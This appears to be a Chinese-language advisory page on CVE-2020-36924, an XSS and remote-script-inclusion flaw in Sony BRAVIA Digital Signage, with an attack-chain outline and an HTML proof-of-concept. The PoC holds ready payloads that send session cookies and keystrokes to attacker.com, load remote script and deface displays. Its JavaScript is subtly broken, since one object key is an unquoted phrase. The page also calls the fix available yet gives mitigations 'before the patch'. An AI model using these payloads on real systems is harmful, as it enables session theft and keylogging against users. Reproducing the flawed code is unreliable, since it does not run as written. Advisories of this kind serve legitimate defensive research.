CVE-2020-36924 Sony BRAVIA Digital Signage 远程文件包含/XSS漏洞

漏洞信息

漏洞编号

CVE-2020-36924

漏洞类型

远程文件包含/跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sony BRAVIA Digital Signage

漏洞概述

CVE-2020-36924是影响Sony BRAVIA Digital Signage 1.7.8版本的安全漏洞，攻击者可通过content material URL参数注入任意客户端脚本。该漏洞属于远程文件包含与跨站脚本攻击(XSS)的组合型漏洞，成功利用可导致用户会话劫持、敏感信息窃取以及显示内容篡改等严重后果。由于该数字标牌系统通常部署于商业环境中，攻击者可能通过诱导管理员或用户访问恶意构造的链接，实现对数字标牌显示内容的非法控制。此外，漏洞无需认证即可利用，但需要用户交互才能触发，这使得攻击具有一定的局限性，但仍需引起高度重视。Sony官方已在pro-bravia.sony.net提供修复版本，建议相关用户及时更新至最新版本以消除安全风险。

技术细节

该漏洞存在于Sony BRAVIA Digital Signage的content material URL参数处理逻辑中。系统在接收用户提交的material URL参数时，未对输入进行充分的过滤和验证，攻击者可构造包含恶意JavaScript代码的URL作为material参数值。当其他用户访问或预览该内容时，恶意脚本将在受害者浏览器上下文中执行，从而实现跨站脚本攻击。

技术细节：
1. 漏洞入口点为content material URL参数
2. 攻击者可通过构造类似?material=http://attacker.com/malicious.js的请求注入脚本
3. 恶意脚本执行后可窃取用户Cookie、会话令牌等信息
4. 攻击者还可修改显示内容，植入虚假信息或钓鱼内容
5. 由于系统通常以较高权限运行，攻击影响范围较大

利用前提：
- 攻击者需诱使受害者访问包含恶意参数的页面
- 受害者需在登录状态下或具有相应权限
- 目标系统需处理并渲染攻击者控制的URL内容

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者收集目标Sony BRAVIA Digital Signage系统信息，确定版本号和配置

STEP 2

步骤2

构造Payload：攻击者构造包含恶意JavaScript代码的material URL参数

STEP 3

步骤3

钓鱼诱导：通过钓鱼邮件、社交工程等方式诱使受害者访问恶意链接

STEP 4

步骤4

脚本执行：受害者访问恶意URL后，浏览器执行注入的恶意脚本

STEP 5

步骤5

会话劫持：恶意脚本窃取用户Cookie和会话令牌

STEP 6

步骤6

内容篡改：攻击者利用窃取的会话修改数字标牌显示内容

STEP 7

步骤7

持久化控制：植入后门或持久化脚本，实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2020-36924 PoC - Sony BRAVIA Digital Signage XSS/RFI -->
<!-- This PoC demonstrates the content material URL parameter injection -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2020-36924 PoC</title>
</head>
<body>
    <h2>CVE-2020-36924 - Sony BRAVIA Digital Signage</h2>
    <h3>Remote File Inclusion / XSS via material URL Parameter</h3>
    
    <p>Attack Vector: Inject malicious script via material URL parameter</p>
    
    <!-- PoC 1: Basic XSS via material parameter -->
    <h4>PoC 1: Reflected XSS</h4>
    <a href="http://target-bravia/signage?material=<script>alert('XSS')</script>">
        Click to Test XSS
    </a>
    
    <!-- PoC 2: Session Hijacking -->
    <h4>PoC 2: Session Hijacking</h4>
    <a href="http://target-bravia/signage?material=<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>">
        Click to Steal Session
    </a>
    
    <!-- PoC 3: Remote File Inclusion -->
    <h4>PoC 3: Remote JavaScript Inclusion</h4>
    <a href="http://target-bravia/signage?material=http://attacker.com/malicious.js">
        Click to Load Remote Script
    </a>
    
    <!-- PoC 4: Content Modification -->
    <h4>PoC 4: Display Content Manipulation</h4>
    <a href="http://target-bravia/signage?material=<img src=x onerror='document.getElementById("display").innerHTML="<h1>HACKED</h1>"'>">
        Click to Modify Display
    </a>
    
    <script>
        // Simulated attack payload construction
        function constructPayload(payloadType) {
            const baseUrl = 'http://target-bravia/signage';
            const payloads = {
                xss: '<script>alert("CVE-2020-36924")</script>',
                cookie theft: '<script>fetch("http://attacker.com/log?c="+btoa(document.cookie))</script>',
                keylogger: '<script>document.onkeypress=function(e){fetch("http://attacker.com/k?"+e.key)}</script>',
                defacement: '<script>document.body.innerHTML="<h1>COMPROMISED</h1>"</script>'
            };
            return baseUrl + '?material=' + encodeURIComponent(payloads[payloadType]);
        }
        
        console.log('CVE-2020-36924 PoC Generator');
        console.log('Use these payloads with the material parameter');
    </script>
</body>
</html>

影响范围

Sony BRAVIA Digital Signage 1.7.8及之前版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)上配置规则，过滤material参数中的<script>、javascript:等危险关键字；2) 限制系统对外部URL的访问，仅允许白名单域名；3) 禁用不必要的URL参数解析功能；4) 增强用户访问控制，实施最小权限原则；5) 启用详细的访问日志审计，便于发现异常攻击行为；6) 对管理员进行安全意识培训，警惕钓鱼攻击。